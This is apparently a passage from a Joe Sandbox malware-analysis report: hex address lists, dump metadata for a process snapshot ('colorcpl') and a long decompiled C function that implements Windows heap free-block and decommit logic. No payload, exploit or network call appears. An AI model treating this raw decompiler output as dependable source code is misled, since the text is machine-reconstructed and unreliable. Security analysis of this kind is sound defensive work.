                                                                                                0x06ed47aa
                                                                                                0x06ed47b0
                                                                                                0x06ed47b4
                                                                                                0x06ed47d3
                                                                                                0x06ed47d8
                                                                                                0x06ed47b6
                                                                                                0x06ed47cb
                                                                                                0x06ed47d0
                                                                                                0x06ed47de
                                                                                                0x06ed47df
                                                                                                0x06ed47e2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed476f
                                                                                                0x06ed476f
                                                                                                0x06ed4778
                                                                                                0x06ed4785
                                                                                                0x06ed4787
                                                                                                0x06ed478c
                                                                                                0x06ed478e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4790
                                                                                                0x06ed4792
                                                                                                0x06ed4794
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4796
                                                                                                0x06ed4799
                                                                                                0x00000000
                                                                                                0x06ed4799
                                                                                                0x00000000
                                                                                                0x06ed45c3
                                                                                                0x06ed45c3
                                                                                                0x06ed45c7
                                                                                                0x06ed45c7
                                                                                                0x06ed45ca
                                                                                                0x06ed45cf
                                                                                                0x06ed45d3
                                                                                                0x06ed45df
                                                                                                0x06ed45e4
                                                                                                0x06ed45e6
                                                                                                0x06ed45e8
                                                                                                0x06ed45ed
                                                                                                0x06ed45ed
                                                                                                0x06ed45f2
                                                                                                0x06ed45f2
                                                                                                0x06ed45f7
                                                                                                0x06ed45fc
                                                                                                0x06ed4602
                                                                                                0x06ed4606
                                                                                                0x06ed4609
                                                                                                0x06ed460f
                                                                                                0x06ed46de
                                                                                                0x06ed46e3
                                                                                                0x06ed46e5
                                                                                                0x06ed46ec
                                                                                                0x06ed46ee
                                                                                                0x06ed46f6
                                                                                                0x06ed46f6
                                                                                                0x06ed46f6
                                                                                                0x06ed46f6
                                                                                                0x06ed46ec
                                                                                                0x06ed4615
                                                                                                0x06ed4615
                                                                                                0x06ed461d
                                                                                                0x06ed462e
                                                                                                0x06ed462e
                                                                                                0x06ed461d
                                                                                                0x06ed460f
                                                                                                0x06ed4609
                                                                                                0x06ed46fd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06ed4710
                                                                                                0x06ed471a
                                                                                                0x06ed4720
                                                                                                0x06ed4720
                                                                                                0x06ed4722
                                                                                                0x06ed472c
                                                                                                0x00000000
                                                                                                0x06ed472e
                                                                                                0x06ed472e
                                                                                                0x00000000
                                                                                                0x06ed472e
                                                                                                0x06ed472c
                                                                                                0x06ed4738
                                                                                                0x06ed473c
                                                                                                0x06ed474b
                                                                                                0x06ed4751
                                                                                                0x06ed4751
                                                                                                0x00000000
                                                                                                0x06ed473c
                                                                                                0x06ed48f4
                                                                                                0x06ed48f4
                                                                                                0x00000000
                                                                                                0x06ed48f4

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                                • API String ID: 0-1357697941
                                                                                                • Opcode ID: f7468bb6c5891df43fdb10b89ef0bc5a6875c0cd5b92090c3b65d2d921455a34
                                                                                                • Instruction ID: 187c521f2817981fa3aa7dfd26740c7f55f4b7c3f7263d04f575b0683e5b5e5f
                                                                                                • Opcode Fuzzy Hash: f7468bb6c5891df43fdb10b89ef0bc5a6875c0cd5b92090c3b65d2d921455a34
                                                                                                • Instruction Fuzzy Hash: 10F13631A10785EFCBA5CF68C484BAAB7F5FF19308F059019E4569B6C0C730E98ACB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 72%
                                                                                                			E06E3A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                                                                                				char _v8;
                                                                                                				signed short _v12;
                                                                                                				signed short _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				signed short _v28;
                                                                                                				signed int _v32;
                                                                                                				signed int _v36;
                                                                                                				signed int _v40;
                                                                                                				signed int _v44;
                                                                                                				signed int _v48;
                                                                                                				unsigned int _v52;
                                                                                                				signed int _v56;
                                                                                                				void* _v60;
                                                                                                				intOrPtr _v64;
                                                                                                				void* _v72;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __ebp;
                                                                                                				unsigned int _t246;
                                                                                                				signed char _t247;
                                                                                                				signed short _t249;
                                                                                                				unsigned int _t256;
                                                                                                				signed int _t262;
                                                                                                				signed int _t265;
                                                                                                				signed int _t266;
                                                                                                				signed int _t267;
                                                                                                				intOrPtr _t270;
                                                                                                				signed int _t280;
                                                                                                				signed int _t286;
                                                                                                				signed int _t289;
                                                                                                				intOrPtr _t290;
                                                                                                				signed int _t291;
                                                                                                				signed int _t317;
                                                                                                				signed short _t320;
                                                                                                				intOrPtr _t327;
                                                                                                				signed int _t339;
                                                                                                				signed int _t344;
                                                                                                				signed int _t347;
                                                                                                				intOrPtr _t348;
                                                                                                				signed int _t350;
                                                                                                				signed int _t352;
                                                                                                				signed int _t353;
                                                                                                				signed int _t356;
                                                                                                				intOrPtr _t357;
                                                                                                				intOrPtr _t366;
                                                                                                				signed int _t367;
                                                                                                				signed int _t370;
                                                                                                				intOrPtr _t371;
                                                                                                				signed int _t372;
                                                                                                				signed int _t394;
                                                                                                				signed short _t402;
                                                                                                				intOrPtr _t404;
                                                                                                				intOrPtr _t415;
                                                                                                				signed int _t430;
                                                                                                				signed int _t433;
                                                                                                				signed int _t437;
                                                                                                				signed int _t445;
                                                                                                				signed short _t446;
                                                                                                				signed short _t449;
                                                                                                				signed short _t452;
                                                                                                				signed int _t455;
                                                                                                				signed int _t460;
                                                                                                				signed short* _t468;
                                                                                                				signed int _t480;
                                                                                                				signed int _t481;
                                                                                                				signed int _t483;
                                                                                                				intOrPtr _t484;
                                                                                                				signed int _t491;
                                                                                                				unsigned int _t506;
                                                                                                				unsigned int _t508;
                                                                                                				signed int _t513;
                                                                                                				signed int _t514;
                                                                                                				signed int _t521;
                                                                                                				signed short* _t533;
                                                                                                				signed int _t541;
                                                                                                				signed int _t543;
                                                                                                				signed int _t546;
                                                                                                				unsigned int _t551;
                                                                                                				signed int _t553;
                                                                                                
                                                                                                				_t450 = __ecx;
                                                                                                				_t553 = __ecx;
                                                                                                				_t539 = __edx;
                                                                                                				_v28 = 0;
                                                                                                				_v40 = 0;
                                                                                                				if(( *(__ecx + 0xcc) ^  *0x6f08a68) != 0) {
                                                                                                					_push(_a4);
                                                                                                					_t513 = __edx;
                                                                                                					L11:
                                                                                                					_t246 = E06E3A830(_t450, _t513);
                                                                                                					L7:
                                                                                                					return _t246;
                                                                                                				}
                                                                                                				if(_a8 != 0) {
                                                                                                					__eflags =  *(__edx + 2) & 0x00000008;
                                                                                                					if(( *(__edx + 2) & 0x00000008) != 0) {
                                                                                                						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                                                                                						_t430 = E06E3DF24(__edx,  &_v12,  &_v16);
                                                                                                						__eflags = _t430;
                                                                                                						if(_t430 != 0) {
                                                                                                							_t157 = _t553 + 0x234;
                                                                                                							 *_t157 =  *(_t553 + 0x234) - _v16;
                                                                                                							__eflags =  *_t157;
                                                                                                						}
                                                                                                					}
                                                                                                					_t445 = _a4;
                                                                                                					_t514 = _t539;
                                                                                                					_v48 = _t539;
                                                                                                					L14:
                                                                                                					_t247 =  *((intOrPtr*)(_t539 + 6));
                                                                                                					__eflags = _t247;
                                                                                                					if(_t247 == 0) {
                                                                                                						_t541 = _t553;
                                                                                                					} else {
                                                                                                						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                                                                                						__eflags = _t541;
                                                                                                					}
                                                                                                					_t249 = 7 + _t445 * 8 + _t514;
                                                                                                					_v12 = _t249;
                                                                                                					__eflags =  *_t249 - 3;
                                                                                                					if( *_t249 == 3) {
                                                                                                						_v16 = _t514 + _t445 * 8 + 8;
                                                                                                						E06E19373(_t553, _t514 + _t445 * 8 + 8);
                                                                                                						_t452 = _v16;
                                                                                                						_v28 =  *(_t452 + 0x10);
                                                                                                						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                                                                                						_v36 =  *(_t452 + 0x14);
                                                                                                						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                                                                                						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                                                                                						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                                                                                						_t256 =  *(_t452 + 0x14);
                                                                                                						__eflags = _t256 - 0x7f000;
                                                                                                						if(_t256 >= 0x7f000) {
                                                                                                							_t142 = _t553 + 0x1ec;
                                                                                                							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                                                                                							__eflags =  *_t142;
                                                                                                							_t256 =  *(_t452 + 0x14);
                                                                                                						}
                                                                                                						_t513 = _v48;
                                                                                                						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                                                                                						_a4 = _t445;
                                                                                                						_v40 = 1;
                                                                                                					} else {
                                                                                                						_t27 =  &_v36;
                                                                                                						 *_t27 = _v36 & 0x00000000;
                                                                                                						__eflags =  *_t27;
                                                                                                					}
                                                                                                					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                                                                                					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                                                                                						_v44 = _t513;
                                                                                                						_t262 = E06E1A9EF(_t541, _t513);
                                                                                                						__eflags = _a8;
                                                                                                						_v32 = _t262;
                                                                                                						if(_a8 != 0) {
                                                                                                							__eflags = _t262;
                                                                                                							if(_t262 == 0) {
                                                                                                								goto L19;
                                                                                                							}
                                                                                                						}
                                                                                                						__eflags =  *0x6f08748 - 1;
                                                                                                						if( *0x6f08748 >= 1) {
                                                                                                							__eflags = _t262;
                                                                                                							if(_t262 == 0) {
                                                                                                								_t415 =  *[fs:0x30];
                                                                                                								__eflags =  *(_t415 + 0xc);
                                                                                                								if( *(_t415 + 0xc) == 0) {
                                                                                                									_push("HEAP: ");
                                                                                                									E06E1B150();
                                                                                                								} else {
                                                                                                									E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                								}
                                                                                                								_push("(UCRBlock != NULL)");
                                                                                                								E06E1B150();
                                                                                                								__eflags =  *0x6f07bc8;
                                                                                                								if( *0x6f07bc8 == 0) {
                                                                                                									__eflags = 1;
                                                                                                									E06ED2073(_t445, 1, _t541, 1);
                                                                                                								}
                                                                                                								_t513 = _v48;
                                                                                                								_t445 = _a4;
                                                                                                							}
                                                                                                						}
                                                                                                						_t350 = _v40;
                                                                                                						_t480 = _t445 << 3;
                                                                                                						_v20 = _t480;
                                                                                                						_t481 = _t480 + _t513;
                                                                                                						_v24 = _t481;
                                                                                                						__eflags = _t350;
                                                                                                						if(_t350 == 0) {
                                                                                                							_t481 = _t481 + 0xfffffff0;
                                                                                                							__eflags = _t481;
                                                                                                						}
                                                                                                						_t483 = (_t481 & 0xfffff000) - _v44;
                                                                                                						__eflags = _t483;
                                                                                                						_v52 = _t483;
                                                                                                						if(_t483 == 0) {
                                                                                                							__eflags =  *0x6f08748 - 1;
                                                                                                							if( *0x6f08748 < 1) {
                                                                                                								goto L9;
                                                                                                							}
                                                                                                							__eflags = _t350;
                                                                                                							goto L146;
                                                                                                						} else {
                                                                                                							_t352 = E06E4174B( &_v44,  &_v52, 0x4000);
                                                                                                							__eflags = _t352;
                                                                                                							if(_t352 < 0) {
                                                                                                								goto L94;
                                                                                                							}
                                                                                                							_t353 = E06E37D50();
                                                                                                							_t447 = 0x7ffe0380;
                                                                                                							__eflags = _t353;
                                                                                                							if(_t353 != 0) {
                                                                                                								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                							} else {
                                                                                                								_t356 = 0x7ffe0380;
                                                                                                							}
                                                                                                							__eflags =  *_t356;
                                                                                                							if( *_t356 != 0) {
                                                                                                								_t357 =  *[fs:0x30];
                                                                                                								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                                                                                								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                                                                                									E06ED14FB(_t447, _t553, _v44, _v52, 5);
                                                                                                								}
                                                                                                							}
                                                                                                							_t358 = _v32;
                                                                                                							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                                                                							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                                                                                							__eflags = _t484 - 0x7f000;
                                                                                                							if(_t484 >= 0x7f000) {
                                                                                                								_t90 = _t553 + 0x1ec;
                                                                                                								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                                                                                								__eflags =  *_t90;
                                                                                                							}
                                                                                                							E06E19373(_t553, _t358);
                                                                                                							_t486 = _v32;
                                                                                                							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                                                                                							E06E19819(_t486);
                                                                                                							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                                                                                							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                                                                                							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                                                                                							__eflags = _t366 - 0x7f000;
                                                                                                							if(_t366 >= 0x7f000) {
                                                                                                								_t104 = _t553 + 0x1ec;
                                                                                                								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                                                                                								__eflags =  *_t104;
                                                                                                							}
                                                                                                							__eflags = _v40;
                                                                                                							if(_v40 == 0) {
                                                                                                								_t533 = _v52 + _v44;
                                                                                                								_v32 = _t533;
                                                                                                								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                                                                								__eflags = _v24 - _v52 + _v44;
                                                                                                								if(_v24 == _v52 + _v44) {
                                                                                                									__eflags =  *(_t553 + 0x4c);
                                                                                                									if( *(_t553 + 0x4c) != 0) {
                                                                                                										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                                                                                										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t449 = 0;
                                                                                                									_t533[3] = 0;
                                                                                                									_t533[1] = 0;
                                                                                                									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                                                                                									_t491 = _t394;
                                                                                                									 *_t533 = _t394;
                                                                                                									__eflags =  *0x6f08748 - 1; // 0x0
                                                                                                									if(__eflags >= 0) {
                                                                                                										__eflags = _t491 - 1;
                                                                                                										if(_t491 <= 1) {
                                                                                                											_t404 =  *[fs:0x30];
                                                                                                											__eflags =  *(_t404 + 0xc);
                                                                                                											if( *(_t404 + 0xc) == 0) {
                                                                                                												_push("HEAP: ");
                                                                                                												E06E1B150();
                                                                                                											} else {
                                                                                                												E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                											}
                                                                                                											_push("((LONG)FreeEntry->Size > 1)");
                                                                                                											E06E1B150();
                                                                                                											_pop(_t491);
                                                                                                											__eflags =  *0x6f07bc8 - _t449; // 0x0
                                                                                                											if(__eflags == 0) {
                                                                                                												__eflags = 0;
                                                                                                												_t491 = 1;
                                                                                                												E06ED2073(_t449, 1, _t541, 0);
                                                                                                											}
                                                                                                											_t533 = _v32;
                                                                                                										}
                                                                                                									}
                                                                                                									_t533[1] = _t449;
                                                                                                									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                                                                									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                                                                                										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                                                                                										_v16 = _t402;
                                                                                                										__eflags = _t402 - 0xfe;
                                                                                                										if(_t402 >= 0xfe) {
                                                                                                											_push(_t491);
                                                                                                											_push(_t449);
                                                                                                											E06EDA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                                                                                											_t533 = _v48;
                                                                                                											_t402 = _v32;
                                                                                                										}
                                                                                                										_t449 = _t402;
                                                                                                									}
                                                                                                									_t533[3] = _t449;
                                                                                                									E06E3A830(_t553, _t533,  *_t533 & 0x0000ffff);
                                                                                                									_t447 = 0x7ffe0380;
                                                                                                								}
                                                                                                							}
                                                                                                							_t367 = E06E37D50();
                                                                                                							__eflags = _t367;
                                                                                                							if(_t367 != 0) {
                                                                                                								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                							} else {
                                                                                                								_t370 = _t447;
                                                                                                							}
                                                                                                							__eflags =  *_t370;
                                                                                                							if( *_t370 != 0) {
                                                                                                								_t371 =  *[fs:0x30];
                                                                                                								__eflags =  *(_t371 + 0x240) & 1;
                                                                                                								if(( *(_t371 + 0x240) & 1) != 0) {
                                                                                                									__eflags = E06E37D50();
                                                                                                									if(__eflags != 0) {
                                                                                                										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                									}
                                                                                                									E06ED1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                                                                                								}
                                                                                                							}
                                                                                                							_t372 = E06E37D50();
                                                                                                							_t546 = 0x7ffe038a;
                                                                                                							_t446 = 0x230;
                                                                                                							__eflags = _t372;
                                                                                                							if(_t372 != 0) {
                                                                                                								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                							} else {
                                                                                                								_t246 = 0x7ffe038a;
                                                                                                							}
                                                                                                							__eflags =  *_t246;
                                                                                                							if( *_t246 == 0) {
                                                                                                								goto L7;
                                                                                                							} else {
                                                                                                								__eflags = E06E37D50();
                                                                                                								if(__eflags != 0) {
                                                                                                									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                                                                                									__eflags = _t546;
                                                                                                								}
                                                                                                								_push( *_t546 & 0x000000ff);
                                                                                                								_push(_v36);
                                                                                                								_push(_v40);
                                                                                                								goto L120;
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						L19:
                                                                                                						_t31 = _t513 + 0x101f; // 0x101f
                                                                                                						_t455 = _t31 & 0xfffff000;
                                                                                                						_t32 = _t513 + 0x28; // 0x28
                                                                                                						_v44 = _t455;
                                                                                                						__eflags = _t455 - _t32;
                                                                                                						if(_t455 == _t32) {
                                                                                                							_t455 = _t455 + 0x1000;
                                                                                                							_v44 = _t455;
                                                                                                						}
                                                                                                						_t265 = _t445 << 3;
                                                                                                						_v24 = _t265;
                                                                                                						_t266 = _t265 + _t513;
                                                                                                						__eflags = _v40;
                                                                                                						_v20 = _t266;
                                                                                                						if(_v40 == 0) {
                                                                                                							_t266 = _t266 + 0xfffffff0;
                                                                                                							__eflags = _t266;
                                                                                                						}
                                                                                                						_t267 = _t266 & 0xfffff000;
                                                                                                						_v52 = _t267;
                                                                                                						__eflags = _t267 - _t455;
                                                                                                						if(_t267 < _t455) {
                                                                                                							__eflags =  *0x6f08748 - 1; // 0x0
                                                                                                							if(__eflags < 0) {
                                                                                                								L9:
                                                                                                								_t450 = _t553;
                                                                                                								L10:
                                                                                                								_push(_t445);
                                                                                                								goto L11;
                                                                                                							}
                                                                                                							__eflags = _v40;
                                                                                                							L146:
                                                                                                							if(__eflags == 0) {
                                                                                                								goto L9;
                                                                                                							}
                                                                                                							_t270 =  *[fs:0x30];
                                                                                                							__eflags =  *(_t270 + 0xc);
                                                                                                							if( *(_t270 + 0xc) == 0) {
                                                                                                								_push("HEAP: ");
                                                                                                								E06E1B150();
                                                                                                							} else {
                                                                                                								E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                							}
                                                                                                							_push("(!TrailingUCR)");
                                                                                                							E06E1B150();
                                                                                                							__eflags =  *0x6f07bc8;
                                                                                                							if( *0x6f07bc8 == 0) {
                                                                                                								__eflags = 0;
                                                                                                								E06ED2073(_t445, 1, _t541, 0);
                                                                                                							}
                                                                                                							L152:
                                                                                                							_t445 = _a4;
                                                                                                							L153:
                                                                                                							_t513 = _v48;
                                                                                                							goto L9;
                                                                                                						}
                                                                                                						_v32 = _t267;
                                                                                                						_t280 = _t267 - _t455;
                                                                                                						_v32 = _v32 - _t455;
                                                                                                						__eflags = _a8;
                                                                                                						_t460 = _v32;
                                                                                                						_v52 = _t460;
                                                                                                						if(_a8 != 0) {
                                                                                                							L27:
                                                                                                							__eflags = _t280;
                                                                                                							if(_t280 == 0) {
                                                                                                								L33:
                                                                                                								_t446 = 0;
                                                                                                								__eflags = _v40;
                                                                                                								if(_v40 == 0) {
                                                                                                									_t468 = _v44 + _v52;
                                                                                                									_v36 = _t468;
                                                                                                									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                                                                                									__eflags = _v20 - _v52 + _v44;
                                                                                                									if(_v20 == _v52 + _v44) {
                                                                                                										__eflags =  *(_t553 + 0x4c);
                                                                                                										if( *(_t553 + 0x4c) != 0) {
                                                                                                											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                                                                                											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t468[3] = 0;
                                                                                                										_t468[1] = 0;
                                                                                                										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                                                                                										_t521 = _t317;
                                                                                                										 *_t468 = _t317;
                                                                                                										__eflags =  *0x6f08748 - 1; // 0x0
                                                                                                										if(__eflags >= 0) {
                                                                                                											__eflags = _t521 - 1;
                                                                                                											if(_t521 <= 1) {
                                                                                                												_t327 =  *[fs:0x30];
                                                                                                												__eflags =  *(_t327 + 0xc);
                                                                                                												if( *(_t327 + 0xc) == 0) {
                                                                                                													_push("HEAP: ");
                                                                                                													E06E1B150();
                                                                                                												} else {
                                                                                                													E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                												}
                                                                                                												_push("(LONG)FreeEntry->Size > 1");
                                                                                                												E06E1B150();
                                                                                                												__eflags =  *0x6f07bc8 - _t446; // 0x0
                                                                                                												if(__eflags == 0) {
                                                                                                													__eflags = 1;
                                                                                                													E06ED2073(_t446, 1, _t541, 1);
                                                                                                												}
                                                                                                												_t468 = _v36;
                                                                                                											}
                                                                                                										}
                                                                                                										_t468[1] = _t446;
                                                                                                										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                                                                                										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                                                                                										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                                                                                											_t320 = _t446;
                                                                                                										} else {
                                                                                                											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                                                                                											_v12 = _t320;
                                                                                                											__eflags = _t320 - 0xfe;
                                                                                                											if(_t320 >= 0xfe) {
                                                                                                												_push(_t468);
                                                                                                												_push(_t446);
                                                                                                												E06EDA80D(_t522, 3, _t468, _t541);
                                                                                                												_t468 = _v52;
                                                                                                												_t320 = _v28;
                                                                                                											}
                                                                                                										}
                                                                                                										_t468[3] = _t320;
                                                                                                										E06E3A830(_t553, _t468,  *_t468 & 0x0000ffff);
                                                                                                									}
                                                                                                								}
                                                                                                								E06E3B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                                                                                								E06E3A830(_t553, _v64, _v24);
                                                                                                								_t286 = E06E37D50();
                                                                                                								_t542 = 0x7ffe0380;
                                                                                                								__eflags = _t286;
                                                                                                								if(_t286 != 0) {
                                                                                                									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                								} else {
                                                                                                									_t289 = 0x7ffe0380;
                                                                                                								}
                                                                                                								__eflags =  *_t289;
                                                                                                								if( *_t289 != 0) {
                                                                                                									_t290 =  *[fs:0x30];
                                                                                                									__eflags =  *(_t290 + 0x240) & 1;
                                                                                                									if(( *(_t290 + 0x240) & 1) != 0) {
                                                                                                										__eflags = E06E37D50();
                                                                                                										if(__eflags != 0) {
                                                                                                											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                										}
                                                                                                										E06ED1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                                                                                									}
                                                                                                								}
                                                                                                								_t291 = E06E37D50();
                                                                                                								_t543 = 0x7ffe038a;
                                                                                                								__eflags = _t291;
                                                                                                								if(_t291 != 0) {
                                                                                                									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                								} else {
                                                                                                									_t246 = 0x7ffe038a;
                                                                                                								}
                                                                                                								__eflags =  *_t246;
                                                                                                								if( *_t246 != 0) {
                                                                                                									__eflags = E06E37D50();
                                                                                                									if(__eflags != 0) {
                                                                                                										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                                                                                										__eflags = _t543;
                                                                                                									}
                                                                                                									_push( *_t543 & 0x000000ff);
                                                                                                									_push(_t446);
                                                                                                									_push(_t446);
                                                                                                									L120:
                                                                                                									_push( *(_t553 + 0x74) << 3);
                                                                                                									_push(_v52);
                                                                                                									_t246 = E06ED1411(_t446, _t553, _v44, __eflags);
                                                                                                								}
                                                                                                								goto L7;
                                                                                                							}
                                                                                                							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                                                                                							_t339 = E06E4174B( &_v44,  &_v52, 0x4000);
                                                                                                							__eflags = _t339;
                                                                                                							if(_t339 < 0) {
                                                                                                								L94:
                                                                                                								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                                                                                								__eflags = _v40;
                                                                                                								if(_v40 == 0) {
                                                                                                									goto L153;
                                                                                                								}
                                                                                                								E06E3B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                                                                                								goto L152;
                                                                                                							}
                                                                                                							_t344 = E06E37D50();
                                                                                                							__eflags = _t344;
                                                                                                							if(_t344 != 0) {
                                                                                                								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                							} else {
                                                                                                								_t347 = 0x7ffe0380;
                                                                                                							}
                                                                                                							__eflags =  *_t347;
                                                                                                							if( *_t347 != 0) {
                                                                                                								_t348 =  *[fs:0x30];
                                                                                                								__eflags =  *(_t348 + 0x240) & 1;
                                                                                                								if(( *(_t348 + 0x240) & 1) != 0) {
                                                                                                									E06ED14FB(_t445, _t553, _v44, _v52, 6);
                                                                                                								}
                                                                                                							}
                                                                                                							_t513 = _v48;
                                                                                                							goto L33;
                                                                                                						}
                                                                                                						__eflags =  *_v12 - 3;
                                                                                                						_t513 = _v48;
                                                                                                						if( *_v12 == 3) {
                                                                                                							goto L27;
                                                                                                						}
                                                                                                						__eflags = _t460;
                                                                                                						if(_t460 == 0) {
                                                                                                							goto L9;
                                                                                                						}
                                                                                                						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                                                                                						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                                                                                							goto L9;
                                                                                                						}
                                                                                                						goto L27;
                                                                                                					}
                                                                                                				}
                                                                                                				_t445 = _a4;
                                                                                                				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                                                                                					_t513 = __edx;
                                                                                                					goto L10;
                                                                                                				}
                                                                                                				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                                                                                				_v20 = _t433;
                                                                                                				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                                                                                					_t513 = _t539;
                                                                                                					goto L9;
                                                                                                				} else {
                                                                                                					_t437 = E06E399BF(__ecx, __edx,  &_a4, 0);
                                                                                                					_t445 = _a4;
                                                                                                					_t514 = _t437;
                                                                                                					_v56 = _t514;
                                                                                                					if(_t445 - 0x201 > 0xfbff) {
                                                                                                						goto L14;
                                                                                                					} else {
                                                                                                						E06E3A830(__ecx, _t514, _t445);
                                                                                                						_t506 =  *(_t553 + 0x238);
